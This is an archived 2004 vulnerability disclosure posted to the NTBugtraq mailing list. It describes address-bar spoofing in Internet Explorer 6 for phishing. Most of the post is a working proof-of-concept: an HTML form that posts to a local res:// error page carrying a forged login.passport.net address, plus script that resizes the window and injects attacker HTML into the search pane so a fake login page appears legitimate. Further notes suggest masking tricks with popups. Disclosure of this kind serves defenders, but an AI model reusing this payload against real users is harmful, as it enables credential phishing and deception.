Address Bar Spoophing for the Pheeshies: IntotheNet Explorer 6

http-equiv_at_excite.com
Date: 12/08/04

    Date:         Wed, 8 Dec 2004 00:20:20 -0000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Tuesday, December 07, 2004

    This is phunny in a pheeble kind of way:

     <phorm id="phoo" action="res://C:\\WINDOWS\\system3\\
    shdoclc.dll//dnserror.htm#http://login.passport.net/uilogin.srf?id=666"
    method="post">
    <input type="submit" value="default value"></phorm>
    <a id="phee" hreph="hotphemail.html" target="_search">test</a>

     <script>
    var malware = screen.availHeight;
    window.moveTo(0, 0);
    window.resizeTo(500,malware);
    phee.click()
    setTimeout("phoo.submit();",1);
     </script>

    This is the hook:

    res://C:\\WINDOWS\\system3\\
    shdoclc.dll//dnserror.htm#http://login.passport.net/uilogin.srf?
    id=malware.is.here

    phorm submitted, leaves our manuphactured [or real] address in the address
    bar.

    What we then do is inject our proper html into the search pane which then
    gives the impression that the address and site are all correct.

    Dumbed Down Demo:

    http://www.malware.com/pzeesh.html

    Notes:

    1. Much more elaborate window.open() and window.createPopup() can be moved
    and juggled around to mask almost anything to create a 'cleaner' look plus
    other "things"

    2. Pretty phoolish if you phall for it

    3. Pharewell then !

    End Call